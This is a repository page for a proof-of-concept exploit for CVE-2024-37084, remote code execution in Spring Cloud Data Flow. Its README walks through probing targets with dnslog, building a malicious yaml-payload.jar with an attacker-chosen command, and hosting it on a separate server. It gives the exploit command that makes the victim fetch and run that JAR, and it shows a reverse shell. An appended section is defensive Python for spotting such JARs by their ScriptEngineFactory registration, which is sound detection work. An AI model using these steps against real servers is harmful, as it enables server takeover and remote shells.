CVE-2024-37084 PoC — CVE-2024-37084: Remote code execution in Spring Cloud Data Flow

Source
Associated Vulnerability
Title: CVE-2024-37084: Remote code execution in Spring Cloud Data Flow (CVE-2024-37084)
Description: In Spring Cloud Data Flow versions prior to 2.11.4, a malicious user who has access to the Skipper server API can use a crafted upload request to write an arbitrary file to any location on the file system, which could lead to compromising the server.
Description
Spring Cloud Data Flow CVE-2024-37084 exp
Readme
1. Use dnslog to detect whether the CVE-2024-37084 vulnerability exists, then manually check dnslog.

`python cve-2024-37084-exp.py -u http://192.168.67.135:7577 -dnslog xxx.dnslog.cn`

2. Then you can execute system commands.

**First:** Enter the command you want to execute in `src\artsploit\AwesomeScriptEngineFactory.java`.

![image](https://github.com/user-attachments/assets/bca82f8a-1b22-4cf8-adb9-96e5650153d2)

**After that:** Double-click the .py file to generate the yaml-payload.jar file.

![image](https://github.com/user-attachments/assets/c6964441-dc24-44a0-8ae4-c5bc3888e70d)

**After that:** Put yaml-payload.jar on the Linux server and start a web service with Python. Note: every time you execute a different command, you need to rename yaml-payload.jar (the xx.jar that you access) to a different name. Otherwise the new command will not take effect.

The access path is as follows: http://192.168.67.133/yaml-payload.jar.

**Finally:** Execute the PoC.

`cve-2024-37084-exp.py -u http://192.168.67.135:7577 -payload http://192.168.67.133/yaml-payload.jar`

![image](https://github.com/user-attachments/assets/13536acf-afb8-4e7d-adf8-629aab9b3157)

Enter the corresponding container to confirm that the command executed successfully.

![image](https://github.com/user-attachments/assets/910021ef-ec3d-4536-b4af-e0c8f86f2d2c)

**Reverse shell:**
![image](https://github.com/user-attachments/assets/24a0bfc1-62f3-4489-bd81-461c6a2955ea)
![image](https://github.com/user-attachments/assets/b6f7cecf-20cd-406e-9fc2-e1284719d7ac)



File Snapshot

```
[4.0K] /data/pocs/c97e6c4114821dd15d588c422f6bb6cf151ebda7
├── [4.8K] cve-2024-37084-exp.py
├── [1.5K] README.md
└── [4.0K] yaml-payload-master
    ├── [ 144] generate-yaml-payload.jar.py
    ├── [4.0K] src
    │   ├── [4.0K] artsploit
    │   │   ├── [1.7K] AwesomeScriptEngineFactory.class
    │   │   └── [1.7K] AwesomeScriptEngineFactory.java
    │   └── [4.0K] META-INF
    │       └── [4.0K] services
    │           └── [ 36] javax.script.ScriptEngineFactory
    └── [2.4K] yaml-payload.jar

5 directories, 7 files
```
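
For defensive triage: the file snapshot shows the payload source tree carrying a `META-INF/services/javax.script.ScriptEngineFactory` registration. The following is an added example, not part of the original repository; it lists the provider classes a JAR registers for that service so fetched or cached JARs can be checked against an allowlist. The function names, the allowlist entry and both sample JARs are constructed for illustration.

```python
import io
import zipfile

# Service-provider file seen in the payload tree in the file snapshot.
SERVICE_ENTRY = "META-INF/services/javax.script.ScriptEngineFactory"

def script_engine_providers(jar_bytes):
    """Return the class names a JAR registers as ScriptEngineFactory providers."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        if SERVICE_ENTRY not in jar.namelist():
            return []
        text = jar.read(SERVICE_ENTRY).decode("utf-8", errors="replace")
    providers = []
    for line in text.splitlines():
        name = line.split("#", 1)[0].strip()  # '#' starts a comment in provider files
        if name:
            providers.append(name)
    return providers

def unexpected_providers(jar_bytes, allowlist):
    """Providers not on the allowlist; any hit means the JAR needs review."""
    return [p for p in script_engine_providers(jar_bytes) if p not in allowlist]

def make_jar(entries):
    """Build an in-memory JAR from {entry name: content} (constructed sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for name, content in entries.items():
            jar.writestr(name, content)
    return buf.getvalue()

# Constructed samples: a plain library JAR and one shaped like the snapshot's tree.
PLAIN_JAR = make_jar({"com/example/Util.class": b"\xca\xfe\xba\xbe"})
SUSPECT_JAR = make_jar({
    SERVICE_ENTRY: "# provider list\nartsploit.AwesomeScriptEngineFactory\n",
    "artsploit/AwesomeScriptEngineFactory.class": b"\xca\xfe\xba\xbe",
})
ALLOWLIST = {"org.example.TrustedScriptEngineFactory"}  # hypothetical allowlist entry

if __name__ == "__main__":
    for label, jar in (("plain", PLAIN_JAR), ("suspect", SUSPECT_JAR)):
        print(label, unexpected_providers(jar, ALLOWLIST))
```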